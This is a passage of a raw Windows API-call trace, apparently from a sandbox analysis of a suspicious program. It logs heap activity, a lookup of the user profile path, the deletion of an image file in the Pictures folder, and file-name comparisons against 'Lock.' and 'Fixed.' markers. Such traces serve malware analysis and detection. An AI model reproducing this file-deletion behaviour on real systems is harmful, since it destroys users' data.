dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0208.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a750d0 [0208.998] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/8xG9dA2_eGqi0pv0b0.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\8xG9dA2_eGqi0pv0b0.bmp", lpFilePart=0x8cedf4*="8xG9dA2_eGqi0pv0b0.bmp") returned 0x2f [0208.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a750d0 | out: hHeap=0x2af0000) returned 1 [0208.998] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\8xG9dA2_eGqi0pv0b0.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\8xg9da2_egqi0pv0b0.bmp")) returned 0x20 [0208.998] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\8xG9dA2_eGqi0pv0b0.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x390ac200, ftCreationTime.dwHighDateTime=0x1d5ce8b, ftLastAccessTime.dwLowDateTime=0x6d57b090, ftLastAccessTime.dwHighDateTime=0x1d5c9b3, ftLastWriteTime.dwLowDateTime=0x6d57b090, ftLastWriteTime.dwHighDateTime=0x1d5c9b3, nFileSizeHigh=0x0, nFileSizeLow=0xe0a8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="8xG9dA2_eGqi0pv0b0.bmp", cAlternateFileName="8XG9DA~1.BMP")) returned 0x9e1bf8 [0208.998] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\8xG9dA2_eGqi0pv0b0.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\8xg9da2_egqi0pv0b0.bmp")) returned 1 [0209.001] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x390ac200, ftCreationTime.dwHighDateTime=0x1d5ce8b, ftLastAccessTime.dwLowDateTime=0x6d57b090, ftLastAccessTime.dwHighDateTime=0x1d5c9b3, ftLastWriteTime.dwLowDateTime=0x6d57b090, ftLastWriteTime.dwHighDateTime=0x1d5c9b3, nFileSizeHigh=0x0, nFileSizeLow=0xe0a8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="8xG9dA2_eGqi0pv0b0.bmp", cAlternateFileName="8XG9DA~1.BMP")) returned 0 [0209.002] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0209.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.002] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.003] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.003] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74c58 [0209.004] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/8xG9dA2_eGqi0pv0b0.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\8xG9dA2_eGqi0pv0b0.bmp", lpFilePart=0x8cf650*="8xG9dA2_eGqi0pv0b0.bmp") returned 0x2f [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74c58 | out: hHeap=0x2af0000) returned 1 [0209.005] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\8xG9dA2_eGqi0pv0b0.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\8xg9da2_egqi0pv0b0.bmp")) returned 0xffffffff [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3f58 | out: hHeap=0x2af0000) returned 1 [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.005] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0209.005] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.005] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0209.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0209.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ_Kkru.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J_Kkru.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Kkru.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kkru.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kru.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ru.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0209.006] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0209.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0209.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0209.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ_Kkru.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J_Kkru.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Kkru.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kkru.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kru.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ru.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6450 | out: hHeap=0x2af0000) returned 1 [0209.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0209.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0209.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.008] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0209.008] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0209.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0209.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0209.008] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0209.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0209.009] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0209.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 